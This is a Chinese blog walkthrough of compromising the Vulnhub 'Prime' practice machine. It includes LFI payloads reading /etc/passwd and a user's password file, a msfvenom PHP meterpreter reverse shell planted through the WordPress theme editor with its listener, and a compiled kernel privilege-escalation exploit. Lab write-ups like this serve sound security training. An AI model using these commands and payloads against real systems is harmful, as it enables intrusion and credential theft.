渗透测试怎么搭建靶机_渗透测试实战——prime靶机入侵

最新推荐文章于 2023-06-11 23:12:57 发布
最新推荐文章于 2023-06-11 23:12:57 发布
阅读量150 收藏 1
点赞数
文章标签: 渗透测试怎么搭建靶机

1939dcec58ecfaf061c8c2c48548beb8.png

原创:safe6合天智汇

原创投稿活动:重金悬赏 | 合天原创投稿等你来

Ip:192.168.0.115

Kali:192.168.0.21

安装好的靶机界面

8c9ef08c2d54693b02480e9d311eb435.png

Nmap扫描端口

【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以到合天网安实验室操作实验——Nmap网络扫描,实验:Nmap网络扫描(合天网安实验室)】

nmap-sV -A 192.168.0.115

804bd0a567f86c53d969a7462c418ec1.png

发现只开了80和22端口,直接从80入口

da6e697f622c3671de48d210f4561324.png

扫描一下目录文件

dirbhttp://192.168.0.115

5a3f1e85f43c08845b3246c4740c41ea.png

通过目录扫描得到

http://192.168.0.115/dev

http://192.168.0.115/secret.txt

http://192.168.0.115/index.php

http://192.168.0.115/image.php

http://192.168.0.115/wordpress

我习惯先从wordpress入手

访问看看http://192.168.0.115/wordpress

edeac7d5f0c860162283e4af57af9e72.png

对wordpress进行扫描

wpscan--url http://192.168.0.115/wordpress/ --enumerate vt,vp,u

be4163b41d327bbe5da76163dd279a97.png

对wordpress进行扫描

最后只得到如下信息

主题WordPresstheme in use: twentynineteen

版本WordPressversion 5.2.2 identified (Insecure, released on 2019-06-18).

http://192.168.0.115/wordpress/readme.html

用户victor

没发现可以利用漏洞,直接尝试Wp爆破

169ad07e0e4511a13fd2c616610763f7.png

没成功

继续访问其余扫描到的文件image.php和index.php差不多

70415bc9afc138c9ea623c5fb7253090.png

最后在secret.txt文件里发现了提示

8ee77b5c6be7fc01d83065814586497c.png

4f05758e51adaf7daddea118512917eb.png

根据github的提示用wfuzz进行测试,最后fuzz出来file参数

ff20427543a513d5d3fb824b051a319a.png

我猜测是应该存在LFI,直接根据secret.txt文件里面提示的包含location.txt获得下一步提示

http://192.168.0.115/?file=location.txt

5711075bd15ba073fbb7d451392d8eef.png

最近成功得到location.txt内容,里面提示在其他php页面用secrettier360参数,

根据上面dirb得到的image.php进行测试

curlhttp://192.168.0.115/image.php?secrettier360=index.php

先尝试读取index.php发现成功

725660174c0da4914ffe3e7366d168bc.png

尝试读取/etc/passwd

curlhttp://192.168.0.115/image.php?secrettier360=/etc/passwd

e41d16c4a03630c287fc031a2180d845.png

LFI漏洞利用的方法学习可到合天网安实验室操作实验——LFI漏洞攻击实践,实验:LFI漏洞攻击实践(合天网安实验室)

于是继续fuzz,看看有没有什么有价值的文件

wfuzz-w safe6/DownFall-LogList.txt -c --hc 404 --hw 17

http://192.168.0.115/image.php?secrettier360=FUZZ

3ea770770db8411839058a918468952e.png

本来想找一下wp-config.php文件,fuzz无果回过头来看etc/passwd文件有什么用户,最后又在里面发现了线索(真是细节决定成败啊)

979cc455ac42e330b45f6fa355040403.png

看看password.txt文件
curlhttp://192.168.0.115/image.php?secrettier360=/home/saket/password.txt

c2d630a510ef987eb093cb6abf04964e.png

试一试ssh密码,发现是错的

8d2df55c9d6b0dbdf7696f963deb6fe9.png

试一试前面拿到的wordpress用户

67bd5f41f7816b4e3b25dbfec5f91ae7.png

没错,我进来了

eacf15b35c2378450b9c6aadf3f42f4d.png

接下来直接拿webshell,打开我们最喜欢的主题编辑器

bce45b567a8e3641cc198599c7d4f305.png

翻了半天,发现只有secret.php可用

于是乎,msf大法要上演了

生成一个payload放进去

msfvenom-p php/meterpreter_reverse_tcp LHOST=192.168.0.21 LPORT=4444 -oshell.php

727b60b42b470cc97ebc725166229217.png

c43e299b4d6366909cc232e932c81718.png

保存之后,打开msf

useexploit/multi/handler

setpayload php/meterpreter_reverse_tcp

setlhost 192.168.0.21

setlport 4444

run

65bd3e637fbf5d63783af56300a7b38a.png

浏览器打开

http://192.168.0.115/wordpress/wp-content/themes/twentynineteen/secret.php

758fc07d34efe4c2b6c6e85e356f8aed.png

d16d82dc9c3d76dfb61e69cfc1b74b6a.png

MSF相关的学习,可到合天网安实验室学习实验——MSFvenom实践,实验:MSFvenom实践(合天网安实验室)通过该实验了解msfvenom和metasploit的用法,生成符合自己要求的shellcode,并成功利用shellcode,学会如何与metasploit配合使用。

接下来就是提权了

用python3-c 'import pty; pty.spawn("/bin/bash")'获取个完整交互的shell

7b3e97bda083c2ac97e5f18cf8bd5af9.png

切换到tmp目录,看一下内核准备提权(meterpreter里面sysinfo一样)

66ee92cbd9e0f9cd285c8ad1360fbc1d.png

回到kali搜索searchsploit16.04 Ubuntu

77e62d136a488af09f6247ff501b8b6e.png

我们这里用LinuxKernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local PrivilegeEscalation进行提权

把45010.c拷到当前目录

cp/usr/share/exploitdb/exploits/linux/local/45010.c ./

编译一下gcc45010.c -o root

082b88bf93361357617fbb7c3ca640d2.png

然后exit()退回到meterpreter

上传一下编译好的

b0a92a1682365d18852029154acf42a3.png

./root执行一下

e3f179eaee8c8b282ec9fc5ee7148be9.png

最后进入root目录拿到flag

c51faec8fe5c104544145a0937c6642e.png

欢迎各位师傅指点

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!

weixin_39745724
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
渗透测试实战——prime靶机入侵
蚁景网安学院
09-26 383
Ip:192.168.0.115Kali:192.168.0.21安装好的靶机界面Nmap扫描端口【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相...
渗透测试PRIME
weixin_44727454的博客
04-07 4087
实验环境 靶机IP:192.168.172.128(通过netdiscover获取) Kali机IP:192.168.172.130 nmap(开放端口) wfuzz(模糊测试) wpscan(针对wordpress) msfvenom (生成回环连接) msfconsole(启用监听模块)
红队打靶:Prime1详细打靶思路之模糊测试+内核提权(vulnhub)
最新发布
Bossfrank的博客
06-11 1546
本篇博客详述了vulnhub靶机prime1的打靶思路过程,并非简单复现writeup。打靶过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客中详述。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
prime1主机渗透
w1157673482的博客
03-01 506
prime1主机渗透
vulnhub Prime1渗透
qq_45455136的博客
03-09 911
Prime1靶场渗透准备环境主机发现端口扫描目录扫描FUZZ和LFIWordPress漏洞扫描Linux内核漏洞提权 准备环境 攻击机与靶机在同一网段下 攻击机:kali 192.168.37.130 靶机Prime1 未知 主机发现 kali使用namp扫描,得到靶机ip 192.168.37.131 kali使用arp-scan扫描,得到靶机ip kali使用netdiscover扫描,得到靶机ip 端口扫描 kali使用nmap扫描靶机全部端口,发现开放了22端口ssh服务和80端口http
vulnhub渗透测试靶机prime-1
weixin_46128614的博客
01-19 1183
靶机下载地址https://www.vulnhub.com/entry/prime-1,358/ nmap -sS -sV -p- -T5 发现只开了22和80那就从80入手吧 浏览器访问 主页除了一张图片啥都没有 dirb扫描目录发现了/wordpress目录和一些其他的页面 其中的image.php,secret.txt都不是默认字典有的,问了几个师傅,说做多了就有经验了,关键字典要自己...
靶机渗透实战(1)–zico2渗透实战
御七彩虹猫
10-16 446
靶机下载地址为:https://download.vulnhub.com/zico/zico2.ova
如何连接Hack The Box的靶机
Gh0st_1n_The_Shell的博客
09-06 1868
首先先注册账号,然后打开页面,在labs哪里选择一个靶机 选择加入 加入后会返回一个IP地址,这个IP地址就是你的ip 然后退出来,点击右上角 三个随便点一个 第一个使用vpn连接到官方的靶机上,然后此靶机是多人公用的 第二个应该是可以把靶机搭载在自己的服务器上,如果有的话 我以第一个举例 选择好端口后就可以点击download vpn,如果想要改服务器的话则需要先将靶机赞同然后再改 把下载下来的文件保存,如果是用虚拟机攻击靶机的话则拷贝到虚拟机内,我是用kali,所以以kali举例 为了方便,
它来了!靶机渗透题目的一次实战记录
kali_Ma的博客
08-05 629
0x00 题目介绍 Sink是HackTheBox上一道难度是insane的Linux靶机,做了很久HackTheBox,第一次做insane难度的,还是学到了很多东西的,在这里跟大家分享一下。 题目主要涉及到的知识点是: HAProxy HTTP request smuggling (CVE-2019-18277) Git commit log AWS CLI Configure 0x01 Port Scan └─# nmap -sC -sV -oA sink 10.129.71.3 Starti.
合天实验室:渗透测试项目一
再走一步
04-23 1306
任务一:注入木马 写一个.jpg的木马文件 浏览器设置127.0.0.1:8080代理 将木马上传到网站 用burpsuit抓包 再单击forward放行,回到页面发现成功上传 关闭代理,访问上传的文件(路径上面有)并用get方式提交phpinfo();试试,从下图可以看到上传的文件奏效了 接着使用中国菜刀啦(在tool文件夹下面) 添加木马文件地址...
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3279
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
攻击机与靶机的文件共享、演示流程以及第三方主机的访问
Ax的博客
04-17 5286
本文主要分享攻击机与靶机互 Ping 及它们之间的文件共享操作,文章结构: 首先会介绍主机与主机之间互 Ping 作为基础部分 其次,分享主干内容:主机与靶机之间文件共享及演示流程 最后,使用自己的 PC(第三方主机)作为攻击机来访问主机的虚拟机,参与共享过程
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值